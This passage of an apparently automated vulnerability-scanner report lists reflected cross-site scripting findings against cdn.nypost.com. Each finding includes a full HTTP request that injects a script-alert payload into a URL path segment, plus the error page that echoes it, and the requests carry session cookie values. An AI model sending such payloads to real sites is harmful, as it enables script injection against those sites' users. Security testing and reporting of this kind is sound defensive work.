Cookie: UnicaID=bHMpUfJ6H2F-Wob5vOe; sb_session_id=a5e25089-a427-4cd1-989e-ef5e82dd5c50; sb_permanent_id=f93674eb-8753-41c4-98a9-595d10169a4f; sb_persisted=eyJmdnQiOiIxMjg2NjQ1Mjg1Iiwidm4iOiIzIiwic3N0IjoiMTI4ODY0NzM4NCIsInNwdCI6MTI4ODY0NzM5NSwic3BkIjoyLCJucHYiOjUsInN1ciI6IiJ9

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 731
Vary: Accept-Encoding
Date: Mon, 01 Nov 2010 21:54:25 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig48f7f<script>alert(1)</script>d51368caf7e/WebPortal/nypost/blocks/breaking_news_bar/breaking_news_bar.js</p>
...[SNIP]...

1.8. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/blocks/breaking_news_bar/breaking_news_bar.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/blocks/breaking_news_bar/breaking_news_bar.js

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload c5909<script>alert(1)</script>b5c937fb111 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortalc5909<script>alert(1)</script>b5c937fb111/nypost/blocks/breaking_news_bar/breaking_news_bar.js HTTP/1.1
Host: cdn.nypost.com
Proxy-Connection: keep-alive
Referer: http://search.nypost.com/search?q=%60&sort=date%3AD%3AS%3Ad1&entsp=a&client=redesign_frontend&entqr=0&oe=UTF-8&ud=1&getfields=*&proxystylesheet=redesign_frontend&output=xml_no_dtd&site=default_collection&filter=p&search_submit=Search
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaID=bHMpUfJ6H2F-Wob5vOe; sb_session_id=a5e25089-a427-4cd1-989e-ef5e82dd5c50; sb_permanent_id=f93674eb-8753-41c4-98a9-595d10169a4f; sb_persisted=eyJmdnQiOiIxMjg2NjQ1Mjg1Iiwidm4iOiIzIiwic3N0IjoiMTI4ODY0NzM4NCIsInNwdCI6MTI4ODY0NzM5NSwic3BkIjoyLCJucHYiOjUsInN1ciI6IiJ9

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 731
Vary: Accept-Encoding
Date: Mon, 01 Nov 2010 21:54:34 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortalc5909<script>alert(1)</script>b5c937fb111/nypost/blocks/breaking_news_bar/breaking_news_bar.js</p>
...[SNIP]...

1.9. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/blocks/breaking_news_bar/breaking_news_bar.js [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/blocks/breaking_news_bar/breaking_news_bar.js

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload d53c7<script>alert(1)</script>409a8d178c7 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal/nypostd53c7<script>alert(1)</script>409a8d178c7/blocks/breaking_news_bar/breaking_news_bar.js HTTP/1.1
Host: cdn.nypost.com
Proxy-Connection: keep-alive
Referer: http://search.nypost.com/search?q=%60&sort=date%3AD%3AS%3Ad1&entsp=a&client=redesign_frontend&entqr=0&oe=UTF-8&ud=1&getfields=*&proxystylesheet=redesign_frontend&output=xml_no_dtd&site=default_collection&filter=p&search_submit=Search
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaID=bHMpUfJ6H2F-Wob5vOe; sb_session_id=a5e25089-a427-4cd1-989e-ef5e82dd5c50; sb_permanent_id=f93674eb-8753-41c4-98a9-595d10169a4f; sb_persisted=eyJmdnQiOiIxMjg2NjQ1Mjg1Iiwidm4iOiIzIiwic3N0IjoiMTI4ODY0NzM4NCIsInNwdCI6MTI4ODY0NzM5NSwic3BkIjoyLCJucHYiOjUsInN1ciI6IiJ9

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 731
Vary: Accept-Encoding
Date: Mon, 01 Nov 2010 21:54:42 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal/nypostd53c7<script>alert(1)</script>409a8d178c7/blocks/breaking_news_bar/breaking_news_bar.js</p>
...[SNIP]...

1.10. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/blocks/breaking_news_bar/breaking_news_bar.js [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/blocks/breaking_news_bar/breaking_news_bar.js

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload c6a5a<script>alert(1)</script>72e7deb3ac2 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal/nypost/blocksc6a5a<script>alert(1)</script>72e7deb3ac2/breaking_news_bar/breaking_news_bar.js HTTP/1.1
Host: cdn.nypost.com
Proxy-Connection: keep-alive
Referer: http://search.nypost.com/search?q=%60&sort=date%3AD%3AS%3Ad1&entsp=a&client=redesign_frontend&entqr=0&oe=UTF-8&ud=1&getfields=*&proxystylesheet=redesign_frontend&output=xml_no_dtd&site=default_collection&filter=p&search_submit=Search
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaID=bHMpUfJ6H2F-Wob5vOe; sb_session_id=a5e25089-a427-4cd1-989e-ef5e82dd5c50; sb_permanent_id=f93674eb-8753-41c4-98a9-595d10169a4f; sb_persisted=eyJmdnQiOiIxMjg2NjQ1Mjg1Iiwidm4iOiIzIiwic3N0IjoiMTI4ODY0NzM4NCIsInNwdCI6MTI4ODY0NzM5NSwic3BkIjoyLCJucHYiOjUsInN1ciI6IiJ9

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 731
Vary: Accept-Encoding
Date: Mon, 01 Nov 2010 21:54:50 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal/nypost/blocksc6a5a<script>alert(1)</script>72e7deb3ac2/breaking_news_bar/breaking_news_bar.js</p>
...[SNIP]...

1.11. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/blocks/breaking_news_bar/breaking_news_bar.js [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/blocks/breaking_news_bar/breaking_news_bar.js

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload d8841<script>alert(1)</script>053895585d6 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal/nypost/blocks/breaking_news_bard8841<script>alert(1)</script>053895585d6/breaking_news_bar.js HTTP/1.1
Host: cdn.nypost.com
Proxy-Connection: keep-alive
Referer: http://search.nypost.com/search?q=%60&sort=date%3AD%3AS%3Ad1&entsp=a&client=redesign_frontend&entqr=0&oe=UTF-8&ud=1&getfields=*&proxystylesheet=redesign_frontend&output=xml_no_dtd&site=default_collection&filter=p&search_submit=Search
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaID=bHMpUfJ6H2F-Wob5vOe; sb_session_id=a5e25089-a427-4cd1-989e-ef5e82dd5c50; sb_permanent_id=f93674eb-8753-41c4-98a9-595d10169a4f; sb_persisted=eyJmdnQiOiIxMjg2NjQ1Mjg1Iiwidm4iOiIzIiwic3N0IjoiMTI4ODY0NzM4NCIsInNwdCI6MTI4ODY0NzM5NSwic3BkIjoyLCJucHYiOjUsInN1ciI6IiJ9

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 731
Vary: Accept-Encoding
Date: Mon, 01 Nov 2010 21:54:58 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal/nypost/blocks/breaking_news_bard8841<script>alert(1)</script>053895585d6/breaking_news_bar.js</p>
...[SNIP]...

1.12. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/blocks/breaking_news_bar/breaking_news_bar.js [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/blocks/breaking_news_bar/breaking_news_bar.js

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload 169b1<script>alert(1)</script>941eb6b7e24 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal/nypost/blocks/breaking_news_bar/breaking_news_bar.js169b1<script>alert(1)</script>941eb6b7e24 HTTP/1.1
Host: cdn.nypost.com
Proxy-Connection: keep-alive
Referer: http://search.nypost.com/search?q=%60&sort=date%3AD%3AS%3Ad1&entsp=a&client=redesign_frontend&entqr=0&oe=UTF-8&ud=1&getfields=*&proxystylesheet=redesign_frontend&output=xml_no_dtd&site=default_collection&filter=p&search_submit=Search
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaID=bHMpUfJ6H2F-Wob5vOe; sb_session_id=a5e25089-a427-4cd1-989e-ef5e82dd5c50; sb_permanent_id=f93674eb-8753-41c4-98a9-595d10169a4f; sb_persisted=eyJmdnQiOiIxMjg2NjQ1Mjg1Iiwidm4iOiIzIiwic3N0IjoiMTI4ODY0NzM4NCIsInNwdCI6MTI4ODY0NzM5NSwic3BkIjoyLCJucHYiOjUsInN1ciI6IiJ9

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 731
Vary: Accept-Encoding
Date: Mon, 01 Nov 2010 21:55:09 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal/nypost/blocks/breaking_news_bar/breaking_news_bar.js169b1<script>alert(1)</script>941eb6b7e24</p>
...[SNIP]...

1.13. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/blocks/fat_header/fat_header.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/blocks/fat_header/fat_header.js

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload a1f49<script>alert(1)</script>2a819db42b6 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfiga1f49<script>alert(1)</script>2a819db42b6/WebPortal/nypost/blocks/fat_header/fat_header.js HTTP/1.1
Host: cdn.nypost.com
Proxy-Connection: keep-alive
Referer: http://search.nypost.com/search?q=%60&sort=date%3AD%3AS%3Ad1&entsp=a&client=redesign_frontend&entqr=0&oe=UTF-8&ud=1&getfields=*&proxystylesheet=redesign_frontend&output=xml_no_dtd&site=default_collection&filter=p&search_submit=Search
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaID=bHMpUfJ6H2F-Wob5vOe; sb_session_id=a5e25089-a427-4cd1-989e-ef5e82dd5c50; sb_permanent_id=f93674eb-8753-41c4-98a9-595d10169a4f; sb_persisted=eyJmdnQiOiIxMjg2NjQ1Mjg1Iiwidm4iOiIzIiwic3N0IjoiMTI4ODY0NzM4NCIsInNwdCI6MTI4ODY0NzM5NSwic3BkIjoyLCJucHYiOjUsInN1ciI6IiJ9

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 717
Vary: Accept-Encoding
Date: Mon, 01 Nov 2010 21:54:13 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfiga1f49<script>alert(1)</script>2a819db42b6/WebPortal/nypost/blocks/fat_header/fat_header.js</p>
...[SNIP]...

1.14. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/blocks/fat_header/fat_header.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/blocks/fat_header/fat_header.js

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 78a84<script>alert(1)</script>18472414dba was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal78a84<script>alert(1)</script>18472414dba/nypost/blocks/fat_header/fat_header.js HTTP/1.1
Host: cdn.nypost.com
Proxy-Connection: keep-alive
Referer: http://search.nypost.com/search?q=%60&sort=date%3AD%3AS%3Ad1&entsp=a&client=redesign_frontend&entqr=0&oe=UTF-8&ud=1&getfields=*&proxystylesheet=redesign_frontend&output=xml_no_dtd&site=default_collection&filter=p&search_submit=Search
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaID=bHMpUfJ6H2F-Wob5vOe; sb_session_id=a5e25089-a427-4cd1-989e-ef5e82dd5c50; sb_permanent_id=f93674eb-8753-41c4-98a9-595d10169a4f; sb_persisted=eyJmdnQiOiIxMjg2NjQ1Mjg1Iiwidm4iOiIzIiwic3N0IjoiMTI4ODY0NzM4NCIsInNwdCI6MTI4ODY0NzM5NSwic3BkIjoyLCJucHYiOjUsInN1ciI6IiJ9

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 717
Vary: Accept-Encoding
Date: Mon, 01 Nov 2010 21:54:20 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal78a84<script>alert(1)</script>18472414dba/nypost/blocks/fat_header/fat_header.js</p>
...[SNIP]...

1.15. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/blocks/fat_header/fat_header.js [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/blocks/fat_header/fat_header.js

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 61410<script>alert(1)</script>71367fd88fd was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal/nypost61410<script>alert(1)</script>71367fd88fd/blocks/fat_header/fat_header.js HTTP/1.1
Host: cdn.nypost.com
Proxy-Connection: keep-alive
Referer: http://search.nypost.com/search?q=%60&sort=date%3AD%3AS%3Ad1&entsp=a&client=redesign_frontend&entqr=0&oe=UTF-8&ud=1&getfields=*&proxystylesheet=redesign_frontend&output=xml_no_dtd&site=default_collection&filter=p&search_submit=Search
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaID=bHMpUfJ6H2F-Wob5vOe; sb_session_id=a5e25089-a427-4cd1-989e-ef5e82dd5c50; sb_permanent_id=f93674eb-8753-41c4-98a9-595d10169a4f; sb_persisted=eyJmdnQiOiIxMjg2NjQ1Mjg1Iiwidm4iOiIzIiwic3N0IjoiMTI4ODY0NzM4NCIsInNwdCI6MTI4ODY0NzM5NSwic3BkIjoyLCJucHYiOjUsInN1ciI6IiJ9

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 717
Vary: Accept-Encoding
Date: Mon, 01 Nov 2010 21:54:28 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal/nypost61410<script>alert(1)</script>71367fd88fd/blocks/fat_header/fat_header.js</p>
...[SNIP]...

1.16. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/blocks/fat_header/fat_header.js [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/blocks/fat_header/fat_header.js

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 454bd<script>alert(1)</script>7d206912668 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal/nypost/blocks454bd<script>alert(1)</script>7d206912668/fat_header/fat_header.js HTTP/1.1
Host: cdn.nypost.com
Proxy-Connection: keep-alive
Referer: http://search.nypost.com/search?q=%60&sort=date%3AD%3AS%3Ad1&entsp=a&client=redesign_frontend&entqr=0&oe=UTF-8&ud=1&getfields=*&proxystylesheet=redesign_frontend&output=xml_no_dtd&site=default_collection&filter=p&search_submit=Search
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaID=bHMpUfJ6H2F-Wob5vOe; sb_session_id=a5e25089-a427-4cd1-989e-ef5e82dd5c50; sb_permanent_id=f93674eb-8753-41c4-98a9-595d10169a4f; sb_persisted=eyJmdnQiOiIxMjg2NjQ1Mjg1Iiwidm4iOiIzIiwic3N0IjoiMTI4ODY0NzM4NCIsInNwdCI6MTI4ODY0NzM5NSwic3BkIjoyLCJucHYiOjUsInN1ciI6IiJ9

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 717
Vary: Accept-Encoding
Date: Mon, 01 Nov 2010 21:54:36 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal/nypost/blocks454bd<script>alert(1)</script>7d206912668/fat_header/fat_header.js</p>
...[SNIP]...

1.17. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/blocks/fat_header/fat_header.js [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/blocks/fat_header/fat_header.js

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 3df28<script>alert(1)</script>d1a0fb4b8b2 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal/nypost/blocks/fat_header3df28<script>alert(1)</script>d1a0fb4b8b2/fat_header.js HTTP/1.1
Host: cdn.nypost.com
Proxy-Connection: keep-alive
Referer: http://search.nypost.com/search?q=%60&sort=date%3AD%3AS%3Ad1&entsp=a&client=redesign_frontend&entqr=0&oe=UTF-8&ud=1&getfields=*&proxystylesheet=redesign_frontend&output=xml_no_dtd&site=default_collection&filter=p&search_submit=Search
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaID=bHMpUfJ6H2F-Wob5vOe; sb_session_id=a5e25089-a427-4cd1-989e-ef5e82dd5c50; sb_permanent_id=f93674eb-8753-41c4-98a9-595d10169a4f; sb_persisted=eyJmdnQiOiIxMjg2NjQ1Mjg1Iiwidm4iOiIzIiwic3N0IjoiMTI4ODY0NzM4NCIsInNwdCI6MTI4ODY0NzM5NSwic3BkIjoyLCJucHYiOjUsInN1ciI6IiJ9

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 717
Vary: Accept-Encoding
Date: Mon, 01 Nov 2010 21:54:44 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal/nypost/blocks/fat_header3df28<script>alert(1)</script>d1a0fb4b8b2/fat_header.js</p>
...[SNIP]...

1.18. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/blocks/fat_header/fat_header.js [REST URL parameter 7]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/blocks/fat_header/fat_header.js

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload 4c1e3<script>alert(1)</script>e90b2074792 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortal/nypost/blocks/fat_header/fat_header.js4c1e3<script>alert(1)</script>e90b2074792 HTTP/1.1
Host: cdn.nypost.com
Proxy-Connection: keep-alive
Referer: http://search.nypost.com/search?q=%60&sort=date%3AD%3AS%3Ad1&entsp=a&client=redesign_frontend&entqr=0&oe=UTF-8&ud=1&getfields=*&proxystylesheet=redesign_frontend&output=xml_no_dtd&site=default_collection&filter=p&search_submit=Search
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaID=bHMpUfJ6H2F-Wob5vOe; sb_session_id=a5e25089-a427-4cd1-989e-ef5e82dd5c50; sb_permanent_id=f93674eb-8753-41c4-98a9-595d10169a4f; sb_persisted=eyJmdnQiOiIxMjg2NjQ1Mjg1Iiwidm4iOiIzIiwic3N0IjoiMTI4ODY0NzM4NCIsInNwdCI6MTI4ODY0NzM5NSwic3BkIjoyLCJucHYiOjUsInN1ciI6IiJ9

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 717
Vary: Accept-Encoding
Date: Mon, 01 Nov 2010 21:54:51 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig/WebPortal/nypost/blocks/fat_header/fat_header.js4c1e3<script>alert(1)</script>e90b2074792</p>
...[SNIP]...

1.19. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/blocks/most_popular/most_popular_functions.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/blocks/most_popular/most_popular_functions.js

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 1b074<script>alert(1)</script>b2160c254f9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig1b074<script>alert(1)</script>b2160c254f9/WebPortal/nypost/blocks/most_popular/most_popular_functions.js HTTP/1.1
Host: cdn.nypost.com
Proxy-Connection: keep-alive
Referer: http://search.nypost.com/search?q=%60&sort=date%3AD%3AS%3Ad1&entsp=a&client=redesign_frontend&entqr=0&oe=UTF-8&ud=1&getfields=*&proxystylesheet=redesign_frontend&output=xml_no_dtd&site=default_collection&filter=p&search_submit=Search
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UnicaID=bHMpUfJ6H2F-Wob5vOe; sb_session_id=a5e25089-a427-4cd1-989e-ef5e82dd5c50; sb_permanent_id=f93674eb-8753-41c4-98a9-595d10169a4f; sb_persisted=eyJmdnQiOiIxMjg2NjQ1Mjg1Iiwidm4iOiIzIiwic3N0IjoiMTI4ODY0NzM4NCIsInNwdCI6MTI4ODY0NzM5NSwic3BkIjoyLCJucHYiOjUsInN1ciI6IiJ9

Response

HTTP/1.1 404 Not Found
Content-Type: text/html;charset=UTF-8
Content-Length: 731
Vary: Accept-Encoding
Date: Mon, 01 Nov 2010 21:54:48 GMT
Connection: close

<html><head><title>M..thode Portal - Error</title><style> * { font-family: arial; color: #666666; } h1 { padding: 2px; background-color: #0E5582; color: #FFFFFF; } h2 { margin: 2px 0px 2px 0px; } p {
...[SNIP]...
<p>/r/SysConfig1b074<script>alert(1)</script>b2160c254f9/WebPortal/nypost/blocks/most_popular/most_popular_functions.js</p>
...[SNIP]...

1.20. http://cdn.nypost.com/r/SysConfig/WebPortal/nypost/blocks/most_popular/most_popular_functions.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.nypost.com
Path:   /r/SysConfig/WebPortal/nypost/blocks/most_popular/most_popular_functions.js

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload ce2a6<script>alert(1)</script>786c1e2c906 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /r/SysConfig/WebPortalce2a6<script>alert(1)</script>786c1e2c906/nypost/blocks/most_popular/most_popular_functions.js HTTP/1.1
Host: cdn.nypost.com
Proxy-Connection: keep-alive
